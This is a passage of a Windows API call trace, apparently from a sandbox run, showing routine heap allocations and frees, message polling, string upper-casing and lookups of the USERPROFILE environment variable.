hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.217] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0124.217] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0124.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0124.217] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0124.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0124.218] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0124.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0124.219] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0124.219] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0124.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0124.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0124.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0124.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0124.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0124.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0124.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0124.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0124.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0124.222] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0124.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0124.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0124.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0124.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0124.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0124.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0124.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0124.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0124.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 